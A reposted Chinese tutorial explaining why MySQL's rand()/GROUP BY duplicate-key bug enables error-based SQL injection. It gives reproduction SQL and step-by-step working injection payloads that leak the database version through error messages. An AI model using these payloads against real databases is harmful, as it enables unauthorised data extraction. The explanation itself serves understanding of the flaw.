网站MYSQL数据库高级爆错注入原分析

日期:2016/9/11 22:10:00 来源:本网整理 阅读:3
s">

网站MYSQL数据库高级爆错注入原分析

作者:佚名 字体:[增加 减小] 来源:互联网 时间:08-24 19:12:36 我要评论

国内只有一大堆高级爆错的利用代码 没人分析原因 这个是去官网查资料后分析给出的,需要的朋友可以参考下
"> 这里主要用了mysql的一个BUG :http://bugs.mysql.com/bug.php?id=8652
grouping on certain parts of the result from rand, causes a duplicate key error.

重现过程:
SQL Code复制内容到剪贴板
  1. use mysql;   
  2. create table r1 (a int); insert into r1 values (1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2);   
  3. select left(rand(),3),a from r1 group by 1;   
  4. select left(rand(),3),a, count(*) from r1 group by 1;   
  5. select round(rand(1),1)  ,a, count(*) from r1 group by 1;  

于是便可以这样拿来爆错注入了。
 

复制代码
代码如下:

select count(*),concat((select version()),left(rand(),3))x from inform<span style="line-height:1.5;">ation_schema.tables group by x;</span>

尝试拿来实战
 

复制代码
代码如下:

select * from user where user='root' and (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x);

提示错误 选择的列应该为一个。那么。我们换一下


复制代码
代码如下:

select * from user where user='root' and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x));<span style="font-family:'sans serif', tahoma, verdana, helvetica;font-size:12px;line-height:1.5;"></span>

 

复制代码
代码如下:

1248 (42000): Every derived table must have its own alias

提示多表查询要有别名 那好办
 

复制代码
代码如下:

select * from user where user='root' and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x)a);

或者
 

复制代码
代码如下:

select * from user where user='root' and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x) as lusiyu);

成功爆粗注入了.

作者: 小残 绳命不息 |折腾不止

  • 本文相关:
  • 详解如何通过“鼠洞”控制电脑
  • “PHP是世界上最好的语言” 不信你看这款PHP写的敲诈者木马
  • SQL注入攻击(攻击与防范)
  • 劫持流量原理是什么?关于劫持流量的种类和产生
  • 各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)
  • 帝国备份王(Empirebak)万能cookie及拿shell方法与防御
  • DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日
  • 一些常见的PHP后门原理分析
  • Mysql语法绕过360scan insert防注入方法
  • 科讯KESION CMS最新版任意文件上传WEBSHELL漏洞
  • 免责声明 - 关于我们 - 联系我们 - 广告联系 - 友情链接 - 帮助中心 - 频道导航
    Copyright © 2015 www.zgxue.com All Rights Reserved